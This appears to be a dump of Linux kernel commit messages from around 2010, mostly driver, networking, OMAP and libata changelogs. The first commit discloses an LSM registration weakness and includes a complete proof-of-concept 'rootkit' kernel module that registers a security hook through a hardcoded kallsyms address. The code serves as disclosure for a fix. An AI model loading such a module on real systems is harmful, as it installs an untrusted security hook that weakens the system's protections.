LSM framework doesn't allow to load a security module on runtime, it must be loaded on boot time.
but in security/security.c:
int register_security(struct security_operations *ops)
{
        ...
        if (security_ops != &default_security_ops)
                return -EAGAIN;
        ...
}
if security_ops == &default_security_ops, it can access to register a security module. If selinux is enabled,
other security modules can't register, but if selinux is disabled on boot time, the security_ops was set to
default_security_ops, LSM allows other kernel modules to use register_security() to register a not trust
security module. For example:

disable selinux on boot time(selinux=0).

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/version.h>
#include <linux/string.h>
#include <linux/list.h>
#include <linux/security.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

extern int register_security(struct security_operations *ops);
int (*new_register_security)(struct security_operations *ops);

int rootkit_bprm_check_security(struct linux_binprm *bprm)
{
        return 0;
}

struct security_operations rootkit_ops = {
                .bprm_check_security = rootkit_bprm_check_security,
};

static int rootkit_init(void)
{
        printk("Load LSM rootkit module.\n");

	/* cat /proc/kallsyms | grep register_security */
        new_register_security = 0xc0756689;
        if (new_register_security(&rootkit_ops)) {
                printk("Can't register rootkit module.\n");
                return 0;
        }
        printk("Register rootkit module ok.\n");

        return 0;
}

static void rootkit_exit(void)
{
        printk("Unload LSM rootkit module.\n");
}

module_init(rootkit_init);
module_exit(rootkit_exit);
Signed-off-by: NZhitong Wang <zhitong.wangzt@alibaba-inc.com>
Signed-off-by: NJames Morris <jmorris@namei.org>

* 'for-linus' of git://gitorious.org/linux-omap-dss2/linux: (49 commits)
  OMAP: DSS2: Taal: Fix TE when resuming
  OMAP: DSS2: Taal: Fix ESD check
  OMAP: DSS2: OMAPFB: Constify some function parameters
  OMAP: DSS2: OMAPFB: install omapfb.h
  OMAP: DSS2: DSI: add error prints
  OMAP: DSS2: TPO-TD03MTEA1: fix function names
  OMAP: DSS2: DSI: add dsi_vc_dcs_read_2() helper
  OMAP: DSS2: OMAPFB: Remove FB_OMAP2_FORCE_AUTO_UPDATE
  OMAP: DSS2: DSI: remove external TE support
  OMAP: DSS2: move timing functions
  OMAP: DSS2: move set/get_wss()
  OMAP: DSS2: move enable/disable/suspend/resume
  OMAP: DSS2: move update() and sync()
  OMAP: DSS2: move set/get_update_mode()
  OMAP: DSS2: move enable/get_te()
  OMAP: DSS2: move get_recommended_bpp()
  OMAP: DSS2: move get_resolution()
  OMAP: DSS2: move enable/disable_channel to overlay manager
  OMAP: DSS2: move wait_vsync()
  OMAP: DSS2: move get/set_rotate()
  ...

Merge branch 'omap-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tmlind/linux-omap-2.6

* 'omap-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tmlind/linux-omap-2.6: (214 commits)
  omap2: Initialize Menelaus and MMC for N8X0
  AM3517 EVM: correct typo - tca6416 mispelt as tca6516
  AM3517 EVM: Enable I2C support
  AM35x: Enable OMAP_MUX in defconfig
  AM35x: Add missing GPIO mux config for EHCI port
  Zoom3: Defconfig update
  omap: i2c: Fix muxing for command line enabled bus
  OMAP4: clock: Remove clock hacks from timer-gp.c
  OMAP4: clock: Add dummy clock nodes for interface clocks
  OMAP4: clock: Rename leaf clock nodes to end with a _ick or _fck
  OMAP2+ clock: revise omap2_clk_{disable,enable}()
  OMAP2/3 clock: combine OMAP2 & 3 boot-time MPU rate change code
  OMAP clockdomain: if no autodeps exist, don't try to add or remove them
  OMAP hwmod: add hwmod class support
  OMAP hwmod: convert header files with static allocations into C files
  OMAP hwmod: convert hwmod to use hardware clock names rather than clkdev dev+con
  OMAP clock: add omap_clk_get_by_name() for use by OMAP hwmod core code
  OMAP3: clock: add capability to change rate of dpll4_m5_ck_3630
  OMAP4 clock: drop the ALWAYS_ENABLED clock flag
  OMAP clock: drop RATE_FIXED clock flag
  ...

* 'for-linus' of git://git.kernel.dk/linux-2.6-block:
  Revert "blkdev: fix merge_bvec_fn return value checks"

This reverts commit 9f7cdbc3.

It's causing oopses om dm setups, so revert it until we investigate.
Reported-by: NDmitry Torokhov <dmitry.torokhov@gmail.com>
Tested-by: NSteven Rostedt <rostedt@goodmis.org>
Signed-off-by: NJens Axboe <jens.axboe@oracle.com>

* git://git.kernel.org/pub/scm/linux/kernel/git/davem/sparc-next-2.6:
  sparc: Support show_unhandled_signals.
  sparc: use __ratelimit
  sunxvr500: Additional PCI id for sunxvr500 driver
  sparc: use asm-generic/scatterlist.h
  sparc64: If 'slot-names' property exist, create sysfs PCI slot information.
  sparc: remove trailing space in messages
  sparc: remove redundant return statements

* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next-2.6: (1341 commits)
  virtio_net: remove forgotten assignment
  be2net: fix tx completion polling
  sis190: fix cable detect via link status poll
  net: fix protocol sk_buff field
  bridge: Fix build error when IGMP_SNOOPING is not enabled
  bnx2x: Tx barriers and locks
  scm: Only support SCM_RIGHTS on unix domain sockets.
  vhost-net: restart tx poll on sk_sndbuf full
  vhost: fix get_user_pages_fast error handling
  vhost: initialize log eventfd context pointer
  vhost: logging thinko fix
  wireless: convert to use netdev_for_each_mc_addr
  ethtool: do not set some flags, if others failed
  ipoib: returned back addrlen check for mc addresses
  netlink: Adding inode field to /proc/net/netlink
  axnet_cs: add new id
  bridge: Make IGMP snooping depend upon BRIDGE.
  bridge: Add multicast count/interval sysfs entries
  bridge: Add hash elasticity/max sysfs entries
  bridge: Add multicast_snooping sysfs toggle
  ...

Trivial conflicts in Documentation/feature-removal-schedule.txt

TE was not initialized properly on power on, which broke TE when resuming
from suspend.
Signed-off-by: NTomi Valkeinen <tomi.valkeinen@nokia.com>

This is no longer needed. I missed to remove this in
567ec874 ("net: convert multiple
drivers to use netdev_for_each_mc_addr, part6")
Signed-off-by: NJiri Pirko <jpirko@redhat.com>
Signed-off-by: NDavid S. Miller <davem@davemloft.net>

In tx/mcc polling, napi_complete() is being incorrectly called
before reaping tx completions. This can cause tx compl processing
to be scheduled on another cpu concurrently which can result in a panic.
This if fixed by calling napi complete() after tx/mcc compl processing
but before re-enabling interrupts (via a cq notify).
Signed-off-by: NSathya Perla <sathyap@serverengines.com>
Signed-off-by: NDavid S. Miller <davem@davemloft.net>

Some sis190 devices don't report LinkChange, so do polling for
link status.

Fixes http://bugzilla.kernel.org/show_bug.cgi?id=11926Signed-off-by: NHerton Ronaldo Krzesinski <herton@mandriva.com.br>
Signed-off-by: NDavid S. Miller <davem@davemloft.net>

Commit e992cd9b (kmemcheck: make bitfield annotations truly no-ops
when disabled) allows us to revert a workaround we did in the past to
not add holes in sk_buff structure.

This patch partially reverts commit 14d18a81
(net: fix kmemcheck annotations) so that sparse doesnt complain:

include/linux/skbuff.h:357:41: error: invalid bitfield specifier for
type restricted __be16.
Reported-by: NStefan Richter <stefanr@s5r6.in-berlin.de>
Signed-off-by: NEric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: NDavid S. Miller <davem@davemloft.net>

Fix the following build error when IGMP_SNOOPING is not enabled.
In file included from net/bridge/br.c:24:
net/bridge/br_private.h: In function 'br_multicast_is_router':
net/bridge/br_private.h:361: error: 'struct net_bridge' has no member named 'multicast_router'
net/bridge/br_private.h:362: error: 'struct net_bridge' has no member named 'multicast_router'
net/bridge/br_private.h:363: error: 'struct net_bridge' has no member named 'multicast_router_timer'
Signed-off-by: NSridhar Samudrala <sri@us.ibm.com>
Acked-by: NRandy Dunlap <randy.dunlap@oracle.com>
Acked-by: NHerbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: NDavid S. Miller <davem@davemloft.net>

Conflicts:
	arch/arm/plat-omap/Kconfig

Merge branch 'davinci-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/khilman/linux-davinci

* 'davinci-for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/khilman/linux-davinci: (40 commits)
  DaVinci DM365: Adding support for SPI EEPROM
  DaVinci DM365: Adding DM365 SPI support
  DaVinci DM355: Modifications to DM355 SPI support
  DaVinci: SPI: Adding header file for SPI support.
  davinci: dm646x: CDCE clocks: davinci_clk converted to clk_lookup
  davinci: clkdev cleanup: remove clk_lookup wrapper, use clkdev_add_table()
  DaVinci: DM365: Voice codec support for the DM365 SoC
  davinci: clock: let clk->set_rate function sleep
  Add SDA and SCL pin numbers to i2c platform data
  davinci: da8xx/omap-l1xx: Add EDMA platform data for da850/omap-l138
  davinci: build list of unused EDMA events dynamically
  davinci: Fix edma_alloc_channel api for EDMA_CHANNEL_ANY case
  davinci: Keep count of channel controllers on a platform
  davinci: Correct return value of edma_alloc_channel api
  davinci: add CDCE949 support on DM6467 EVM
  davinci: add support for CDCE949 clock synthesizer
  davinci: da850/omap-l138 EVM: register for suspend support
  davinci: da850/omap-l138: add support for SoC suspend
  davinci: add power management support
  DaVinci: DM365: Changing default queue for DM365.
  ...

* 'upstream-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/jgarzik/libata-dev: (38 commits)
  sata_via: Delay on vt6420 when starting ATAPI DMA write
  ata: Detect Delkin Devices compact flash
  pata_efar: Enable parallel scanning
  pata_atiixp: enable parallel scan
  [libata] pata_atiixp: add locking for parallel scanning
  [libata] pata_efar: add locking for parallel scanning
  libata: Pass host flags into the pci helper
  [libata] pata_marvell: CONFIG_AHCI is really CONFIG_SATA_AHCI
  libata: Allow pata_legacy to be built on non-ISA but PCI systems
  pata_pdc202xx_old: fix UDMA mode for PDC2026x chipsets
  pata_pdc202xx_old: fix UDMA mode for Promise UDMA33 cards
  [libata] pata_at91: fix backslash-continued string
  pata_via: store UDMA masks in via_isa_bridges table
  pata_via: fix address setup timings underlocking
  pata_serverworks: fix error message
  pata_serverworks: fix PIO setup for the second channel
  pata_efar: fix secondary port support
  pata_cypress: fix PIO timings underclocking
  pata_cs5535: use correct values for PIO1 and PIO2 data timings
  pata_cmd64x: remove unused definitions
  ...

When writing a disc on certain lite-on dvd-writers (also rebadged
as optiarc/LG/...) connected to a vt6420, the ATAPI CDB ends
up in the datastream and on the disc, causing silent corruption.
Delaying between sending the CDB and starting DMA seems to
prevent this.

I do not know if there are burners that do not suffer from
this, but the patch should be safe for those as well.

There are many reports of this issue, but AFAICT no solution was
found before. For example:
http://lkml.indiana.edu/hypermail/linux/kernel/0802.3/0561.htmlSigned-off-by: NBart Hartgers <bart.hartgers@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

I have a Delkin Devices compact flash card that isn't being recognized using the
SATA/PATA drivers.
The card is recognized and works with the deprecated ATA drivers.

The error I am seeing is:
ata1.00: failed to IDENTIFY (device reports invalid type, err_mask=0x0)

I tracked it down to ata_id_is_cfa() in include/linux/ata.h.
The Delkin card has id[0] set to 0x844a and id[83] set to 0.
This isn't what the kernel expects and is probably incorrect.

The simplest work-around is to add a check for 0x844a to ata_id_is_cfa().
Signed-off-by: NBen Gardner <gardner.ben@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

Again originally proposed by Bartlomiej but this does it by using the
generic helper logic instead.
Signed-off-by: NAlan Cox <alan@linux.intel.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

This was originally proposed by Bartlomiej but as a device specific
expansion of the init_one function rather than making the helper more
generic.

Enable the parallel scan via the generic flags.
Signed-off-by: NAlan Cox <alan@linux.intel.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

This is similar change as commit 60c3be38 for ata_piix host driver
and while pata_atiixp doesn't enable parallel scan yet the race
could probably also be triggered by requesting re-scanning of both
ports at the same time using SCSI sysfs interface.

[Ported to current tree without other patch dependancies by Alan Cox]

Original is
Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>

This one is
Signed-off-by: NAlan Cox <alan@linux.intel.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

Add clearing of UDMA enable bit also for PIO modes and then add
extra locking for parallel scanning.

This is similar change as commit 60c3be38 for ata_piix host driver
and while pata_efar doesn't enable parallel scan yet the race could
probably also be triggered by requesting re-scanning of both ports
at the same time using SCSI sysfs interface.

[Ported to current kernel without other patch dependancies by
 Alan Cox]

Original is
Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>

This one is
Signed-off-by: NAlan Cox <alan@linux.intel.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

This allows parallel scan and the like to be set without having to stop
using the existing full helper functions. This patch merely adds the argument
and fixes up the callers. It doesn't undo the special cases already in the
tree or add any new parallel callers.
Signed-off-by: NAlan Cox <alan@linux.intel.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

The marvell driver comtains a fallback to ahci for the sata ports
which is incorrectly checked as CONFIG_AHCI while the only AHCI config
item is actually called SATA_AHCI (which also sounds sensible
considering it's a fallback for the sata ports).
Signed-off-by: NChristoph Egger <siccegge@stud.informatik.uni-erlangen.de>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

This is needed for some unsupported hardware setups on strange 64bit
mainboards where crazy stuff has been done like putting flash ata adapters
on the LPC bus, or where the real hardware is hidden/confused.
Signed-off-by: NAlan Cox <alan@linux.intel.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

PDC2026x chipsets need the same treatment as PDC20246 one.

This is completely untested but will hopefully fix UDMA issues
that people have been reporting against pata_pdc202xx_old for
the last couple of years.
Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

On Monday 04 January 2010 02:30:24 pm Russell King wrote:

> Found the problem - getting rid of the read of the alt status register
> after the command has been written fixes the UDMA CRC errors on write:
>
> @@ -676,7 +676,8 @@ void ata_sff_exec_command(struct ata_port *ap, const struct
> ata_taskfile *tf)
>         DPRINTK("ata%u: cmd 0x%X\n", ap->print_id, tf->command);
>
>         iowrite8(tf->command, ap->ioaddr.command_addr);
> -       ata_sff_pause(ap);
> +       ndelay(400);
> +//     ata_sff_pause(ap);
>  }
>  EXPORT_SYMBOL_GPL(ata_sff_exec_command);
>
>
> This rather makes sense.  The PDC20247 handles the UDMA part of the
> protocol.  It has no way to tell the PDC20246 to wait while it suspends
> UDMA, so that a normal register access can take place - the 246 ploughs
> on with the register access without any regard to the state of the 247.
>
> If the drive immediately starts the UDMA protocol after a write to the
> command register (as it probably will for the DMA WRITE command), then
> we'll be accessing the taskfile in the middle of the UDMA setup, which
> can't be good.  It's certainly a violation of the ATA specs.

Fix it by adding custom ->sff_exec_command method for UDMA33 chipsets.
Debugged-by: NRussell King <rmk@arm.linux.org.uk>
Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

Noticed and rough patch by Joe Perches.
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

* store UDMA masks in via_isa_bridges[] and while at it make "flags"
  field to be u8 instead of u16

* convert the driver to use UDMA masks from via_isa_bridges[]

* remove no longer needed VIA_UDMA* defines

Make some minor documentation and CodingStyle fixes while at it.
Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

Correct via_do_set_mode() documentation while at it.
Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

Timing registers should be programmed with the desired number of clocks
minus one clock.
Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

There shouldn't be any problems with it as IDE cs5535 host driver
has been using those values for years and they match values given
in the (publicly available) datasheet.
Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

s/ARTIM2/ARTTIM23/ in cmd648_bmdma_stop() while at it
Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

Clear the primary channel pending interrupt bit
instead of the reserved one.
Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

Account for the requirements of the DMA mode currently used
by the pair device.
Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

Fix incorrect handling of recovery clocks value == 16 resulting
in overclocked recovery timings & potentially underclocked active
timings.
Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>

Signed-off-by: NBartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Signed-off-by: NJeff Garzik <jgarzik@redhat.com>